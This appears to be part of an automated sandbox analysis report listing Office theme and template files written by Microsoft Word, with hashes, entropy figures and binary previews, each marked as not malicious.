                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):278
                                                      Entropy (8bit):3.535736910133401
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                      SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                      SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                      SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):777647
                                                      Entropy (8bit):7.689662652914981
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                      SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                      SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                      SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):290
                                                      Entropy (8bit):3.5091498509646044
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                      SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                      SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                      SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):486596
                                                      Entropy (8bit):7.668294441507828
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                      SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                      SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                      SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):274
                                                      Entropy (8bit):3.535303979138867
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:35AFE8D8724F3E19EB08274906926A0B
                                                      SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                      SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                      SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):608122
                                                      Entropy (8bit):7.729143855239127
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8BA551EEC497947FC39D1D48EC868B54
                                                      SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                      SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                      SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):278
                                                      Entropy (8bit):3.516359852766808
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                      SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                      SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                      SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):924687
                                                      Entropy (8bit):7.824849396154325
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:97EEC245165F2296139EF8D4D43BBB66
                                                      SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                      SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                      SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):282
                                                      Entropy (8bit):3.51145753448333
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                      SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                      SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                      SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):1649585
                                                      Entropy (8bit):7.875240099125746
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                      SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                      SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                      SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):284
                                                      Entropy (8bit):3.5552837910707304
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                      SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                      SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                      SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):966946
                                                      Entropy (8bit):7.8785200658952
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                      SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                      SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                      SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):282
                                                      Entropy (8bit):3.5323495192404475
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                      SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                      SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                      SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):976001
                                                      Entropy (8bit):7.791956689344336
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9E563D44C28B9632A7CF4BD046161994
                                                      SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                      SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                      SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):278
                                                      Entropy (8bit):3.5270134268591966
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:327DA4A5C757C0F1449976BE82653129
                                                      SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                      SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                      SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):1204049
                                                      Entropy (8bit):7.92476783994848
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:FD5BBC58056522847B3B75750603DF0C
                                                      SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                      SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                      SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):276
                                                      Entropy (8bit):3.5364757859412563
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                      SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                      SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                      SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):1463634
                                                      Entropy (8bit):7.898382456989258
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                      SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                      SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                      SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                      Malicious:false
                                                      Reputation:unknown
